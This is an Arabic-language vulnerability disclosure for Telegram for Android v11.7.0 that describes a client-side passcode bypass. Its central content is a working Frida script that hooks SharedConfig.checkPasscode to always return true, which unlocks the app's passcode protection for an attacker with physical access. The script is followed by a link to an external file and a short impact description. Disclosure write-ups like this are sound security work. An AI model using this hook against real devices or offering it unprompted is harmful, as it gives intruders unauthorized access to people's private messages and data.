
إثبات مفهوم قائم على Frida يوضح تجاوز المصادقة في تطبيق Telegram لنظام Android عن طريق ربط SharedConfig.checkPasscode لإرجاع true دائمًا، مما يتيح الوصول غير المصرح به.
تسمح مشكلة في فئة SharedConfig الخاصة بـ Telegram Android APK v.11.7.0 لمهاجم قريب جسدياً بتجاوز المصادقة ورفع الامتيازات عن طريق التلاعب بقيمة الإرجاع لطريقة checkPasscode.
تجاوز المصادقة
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
هذه الثغرة هي مشكلة تجاوز مصادقة من جهة العميل. تؤثر على المستخدمين الذين يعتمدون على ميزة رمز المرور لتأمين البيانات الحساسة أو تقييد الوصول إلى وظائف تطبيق محددة. من خلال استغلال هذه الثغرة، يمكن لمهاجم قريب جسدياً التلاعب بعملية التحقق من رمز المرور، وتجاوز المصادقة، والحصول على وصول غير مصرح به إلى المناطق المحمية في التطبيق. قد يؤدي ذلك إلى تعرض بيانات المستخدم الحساسة أو إجراءات غير مصرح بها داخل التطبيق.